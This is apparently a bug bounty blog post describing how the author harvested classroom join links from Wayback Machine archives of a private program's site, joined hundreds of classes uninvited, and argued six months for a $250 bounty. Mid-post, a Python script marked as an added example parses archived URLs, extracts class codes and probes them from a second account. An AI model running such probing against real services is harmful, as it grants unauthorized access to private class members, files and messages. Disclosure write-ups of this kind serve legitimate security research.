A bug that made me $250

yashdharmani
3 min read, Mar 12, 2022

Hey guys! I’m back with another write-up and this one’s about a bug for which I got awarded $250, so let’s start.

This was a private program on Hackerone and I am not allowed to reveal its name so for that reason I’ll call it REDACTED.

So, upon being invited to this program, I looked at the scope of the program and it had *.redacted.com in scope.

I did some basic subdomain enumeration and fuzzing on its subdomains, and while those tools were doing their work I started playing with the application's functionality.

The application had a feature for joining classes, much like joining a meeting in Microsoft Teams or Zoom. Inside a class you can see the people who are in it, the files being shared, their text messages and some other information.

I created a class for myself from one account and tried to join it from another account. To join a class, you have to get the link for that particular classroom.

“We have to get a link to join that particular classroom.” Did something click in your mind?

Immediately I went to gather all the waybackurls for the domain, and there I saw links for more than 400 classes. To my surprise, I was able to join most of them.
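The workflow above, as an added example (this is not the author's tooling): pull archived URLs for the in-scope domain from the Wayback Machine's CDX API, de-duplicate the class codes hidden in join links (tracking parameters and repeated snapshots inflate the raw count), then probe each code from a second, uninvited account and classify the result. The CDX text layout `urlkey timestamp original mimetype statuscode digest length` is the API's real default; the join-link shapes `/join/<CODE>` and `/join?code=<CODE>`, the host names and the response wording are assumptions, since the write-up never shows the real ones, and the sample CDX lines and canned responses are constructed so the script runs offline.

```python
"""Mine Wayback CDX output for classroom join links and probe the codes.

Added example, not the author's code. Assumptions (the page does not show
the real values): join links look like https://app.redacted.com/join/<CODE>
or https://app.redacted.com/join?code=<CODE>; an approval-gated class answers
a join attempt with a page containing "pending approval".
"""
import re
from typing import Callable, Iterable
from urllib.parse import parse_qs, urlsplit

# Constructed sample of the CDX API's default text layout
# (urlkey timestamp original mimetype statuscode digest length). A live run would fetch
# https://web.archive.org/cdx/search/cdx?url=*.redacted.com/*&output=txt
SAMPLE_CDX = """\
com,redacted,app)/join/abc123 20210812103015 https://app.redacted.com/join/Abc123 text/html 200 ABCDEFGHIJKLMNOPQRSTUVWXYZ234567 1234
com,redacted,app)/join/abc123?utm_source=mail 20210901120000 https://app.redacted.com/join/Abc123?utm_source=mail text/html 200 ABCDEFGHIJKLMNOPQRSTUVWXYZ234567 1234
com,redacted,app)/join?code=zzz999 20211003080000 https://app.redacted.com/join?code=ZZZ999 text/html 200 ZYXWVUTSRQPONMLKJIHGFEDCBA765432 999
com,redacted,app)/login 20211003080100 https://app.redacted.com/login text/html 200 QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ 2048
com,redacted,app)/join/abc123 20211103080100 https://app.redacted.com/join/Abc123 text/html 404 RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR 512
com,redacted,static)/assets/join/logo.png 20211103080200 https://static.redacted.com/assets/join/logo.png image/png 200 SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS 4096
"""

# Hypothetical join-link shapes (assumption: the real path format is not on the page).
PATH_CODE = re.compile(r"^/join/([A-Za-z0-9]{6,12})/?$")
CODE_SHAPE = re.compile(r"[A-Za-z0-9]{6,12}")
QUERY_CODE_KEYS = ("code", "class_code")
IN_SCOPE_SUFFIX = ".redacted.com"   # the program's *.redacted.com scope


def parse_cdx(text: str) -> list[str]:
    """Return the `original` URL (third field) of every CDX line, skipping blanks."""
    urls = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue
        urls.append(fields[2])
    return urls


def extract_class_codes(urls: Iterable[str]) -> set[str]:
    """Collect unique class codes from join links; snapshots and UTM params collapse to one code."""
    codes: set[str] = set()
    for url in urls:
        parts = urlsplit(url)
        host = parts.hostname or ""
        if not host.endswith(IN_SCOPE_SUFFIX):
            continue
        m = PATH_CODE.match(parts.path)
        if m:
            codes.add(m.group(1))
            continue
        if parts.path.rstrip("/") == "/join":
            qs = parse_qs(parts.query)
            for key in QUERY_CODE_KEYS:
                for value in qs.get(key, []):
                    if CODE_SHAPE.fullmatch(value):
                        codes.add(value)
    return codes


def classify_join(status: int, body: str) -> str:
    """Turn a join attempt's HTTP response into a verdict (response wording is assumed)."""
    if status in (401, 403):
        return "denied"
    if status == 404:
        return "gone"
    if status == 200 and "pending approval" in body.lower():
        return "approval-required"   # the mitigating setting the program pointed to
    if status == 200:
        return "joined"              # the finding: the code alone grants membership
    return f"unexpected-{status}"


def probe(codes: Iterable[str], fetch: Callable[[str], tuple[int, str]]) -> dict[str, str]:
    """fetch(code) -> (status, body), issued from the second account; returns code -> verdict."""
    return {code: classify_join(*fetch(code)) for code in sorted(codes)}


def _fake_fetch(code: str) -> tuple[int, str]:
    """Constructed responses so the demo runs offline; a live test would use the
    second account's authenticated requests.Session() against the join URL."""
    canned = {
        "Abc123": (200, "<h1>Welcome to Biology 101</h1>"),
        "ZZZ999": (200, "Your request is pending approval by the teacher"),
    }
    return canned.get(code, (404, "not found"))


if __name__ == "__main__":
    found = extract_class_codes(parse_cdx(SAMPLE_CDX))
    for code, verdict in probe(found, _fake_fetch).items():
        print(f"{code}: {verdict}")
```

Only codes that come back `joined` belong in the report; `approval-required` shows the existing mitigation working, and `gone` codes are just archive noise. Keep the probing account's membership list so every class you joined during testing can be left again.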

IMPACT:-

The impact here was that an attacker could join those classes and gain access to all the information shared there: the list of people in each class, the files shared, and a lot of other content. The attacker could also create a nuisance in those classes. The underlying problem is that the join link is the only thing needed to become a member, so once those links end up in a public archive like the Wayback Machine they are no longer a secret, and any class whose teacher has not enabled the approval-to-join setting is effectively open.

TIMELINE:-

Sep 26th (6 months ago): Reported to the program on Hackerone.

Oct 5th (5 months ago): Triaged.

Oct 26th (5 months ago): Response from the program: Hey @yashdharmani — Class codes are considered public and not confidential. Teachers freely share these so people can join their class. There is a feature that they can enable to require approval for each class member to join but it’s not required. See https://help.redacted.com/hc/en-us/articles/36xxxxxxx1xx-Require-approval-to-join-a-class. Basically, it’s the program staff saying it is a feature.

Oct 26th (5 months ago): My response: @asxxxxxx_m Yes, I agree that these are shared freely, but in my POV, if an attacker is able to get these codes then he can create a nuisance and steal data. I’m presenting the point that I am able to join these classes even though these codes were NOT shared with me. Hope you get my point.

From Oct 26th 2021 till March 12th 2022 I was in conversation with the team, going back and forth explaining my point.

Mar 12th 2022: The team accepted the bug and rewarded me a bounty of $250.

See, sometimes it’s all about being patient and having confidence in yourself and faith in god. This bug took more than 6 months to get accepted by the program, and many times I thought of closing the report from my end, thinking it was a dead report. Still, I had confidence in myself, knew it was a valid bug, kept talking back and forth with the team and waited patiently for their response. Patience is the key.

Thanks for the read guys. See ya around.

Instagram: https://www.instagram.com/yashdharmaniii/

Youtube: https://www.youtube.com/channel/UClD07mxkKSvczsae3uwlX2g

Twitter: https://twitter.com/yashdharmani4
